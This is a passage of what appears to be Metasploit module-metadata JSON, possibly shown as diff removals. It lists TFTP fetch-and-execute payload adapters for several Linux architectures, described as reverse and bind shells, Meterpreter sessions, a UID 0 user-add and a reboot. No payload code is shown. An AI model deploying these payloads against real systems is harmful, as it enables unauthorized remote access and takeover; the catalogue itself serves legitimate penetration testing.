"payload/cmd/linux/tftp/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/tftp/aarch64/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/aarch64", - "adapted_refname": "linux/aarch64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_https", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armbe/shell_bind_tcp": { - "name": "TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Balazs Bucsay @xoreipeip " - ], - "description": "Fetch and execute an ARMBE payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armbe", - "adapted_refname": "linux/armbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armle/adduser": { - "name": "TFTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/tftp/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/adduser", - "staged": false - }, - "payload_cmd/linux/tftp/armle/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/tftp/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command", - "references": [], - "platform": "Linux", 
- "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/exec", - "staged": false - }, - "payload_cmd/linux/tftp/armle/meterpreter/bind_tcp": { - "name": "TFTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/tftp/armle/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan 
Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/tftp/armle/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_http", - "staged": false - }, - 
"payload_cmd/linux/tftp/armle/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/armle/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
"adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armle/shell/bind_tcp": { - "name": "TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/tftp/armle/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": 
"/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/tftp/armle/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ", - "hal" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/armle/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ" - ], - "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back 
to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/armle", - "adapted_refname": "linux/armle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mips64/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/mips64/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan 
Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/mips64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/exec": { - "name": "TFTP Fetch, Linux Execute Command", - "fullname": 
"payload/cmd/linux/tftp/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/exec", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp": { - "name": "TFTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_http": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_https": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - 
"is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/reboot": { - "name": "TFTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/tftp/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup 
procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/reboot", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/tftp/mipsbe/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command 
Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/mipsbe", - "adapted_refname": "linux/mipsbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/mipsbe/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 